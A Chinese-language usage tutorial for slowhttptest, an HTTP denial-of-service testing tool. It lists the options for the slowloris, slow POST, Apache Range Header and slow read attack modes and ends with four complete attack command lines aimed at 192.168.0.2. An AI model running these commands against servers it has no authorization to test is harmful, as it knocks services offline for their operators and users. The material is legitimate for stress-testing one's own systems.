Slowhttptest使用教程

Slowhttptest使用教程

---

Slowhttptest使用教程

四大类

-H  slowloris模式 (默认)
-B  slow http post模式
-R  Apache Range Header attack模式
-X  slow read attack模式

报告选项

-g  输出保存统计数据并以slow_xxx.csv/html文件命名（xxx表示时间戳） (off)
-o file_prefix    自定义输出保存统计数据的文件名（需要-g参数）
-v level    输出日志详细度等级0-4: Fatal, Info, Error, Warning, Debug

常规选项

-c connections    目标连接数，最大不超过65539 (50)
-i seconds    在slowrois和Slow POST模式中，每个连接发送数据的时间间隔 (10s)
-l seconds    目标测试连接时长 (240s)
-r rate    每秒连接数 (50)
-s bytes    slow post攻击模式下，Content-Length头的大小(默认4096字节)
-t verb    自定义请求动作, 默认slowloris使用GET，slow post使用POST
-u URL    指定目标url (http://localhost/)
-x bytes    在slowrois和Slow POST模式中，每次发送最大数据长度(32)
-f content-type    Content-type头的值 (application/x-www-form-urlencoded)

探测/代理选项

-d host:port    所有流量指定HTTP代理 (off)
 -e host:port    探测流量指定HTTP代理 (off)
 -p seconds     设置探测连接http响应的超时时间，超过则认为服务器无法访问(5) -d host:port    所有流量指定HTTP代理 (off)    -e host:port    探测流量指定HTTP代理 (off)    -p seconds     设置探测连接http响应的超时时间，超过则认为服务器无法访问(5)

Range attack特殊选项

-a start    ranges-specifier的起始值 (5)
-b bytes    ranges-specifier的最大值 (2000)

Slow read特殊选项

-k num    如果服务器支持HTTP pipe-lining，则在同一连接中重复请求次数。(1)
-n seconds    从接收缓冲区读取操作的时间间隔 (1)
-w bytes    设置tcp window窗口大小的起始值 (1)
-y bytes    设置tcp window窗口大小的结束值 (512)
-z bytes    每次read()调用从接收缓冲区慢速读取的字节 (5)

slowloris

slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u http://192.168.0.2 -x 24 -p 3

slow http post

slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://192.168.0.2 -x 10 -p 3

slow read attack

slowhttptest -c 8000 -X -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u http://192.168.0.2 -p 3 -g -o slow_read_stats

Apache Range Header attack

slowhttptest -R -u http://192.168.0.2 -t HEAD -c 65539 -a 10 -b 3000 -r 500 -g -o range_header_stats